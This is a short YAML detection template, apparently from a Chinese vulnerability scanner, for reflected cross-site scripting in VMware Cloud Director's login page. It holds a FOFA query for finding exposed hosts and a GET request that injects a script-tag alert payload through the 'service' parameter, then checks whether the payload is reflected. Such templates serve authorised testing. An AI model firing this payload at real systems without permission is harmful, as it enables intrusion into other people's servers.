product: Vmware-Cloud
vName: VMWare Cloud - Cross Site Scripting
type: 跨站脚本
vID: [ ]
level: 2
vDesc: ''
version: ''
note: ''
search:
  FOFA: app="vmware-Cloud-Director"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /login/?redirectTo=/tenant/e&service=</script><script>alert(document.domain)</script>
    verify:
      logic: and
      check:
        - body:
            value:
              - </script><script>alert(document.domain)</script>
              - let tokens = "
            logic: and
        - header:
            value:
              - text/html
            logic: and
        - status: 200
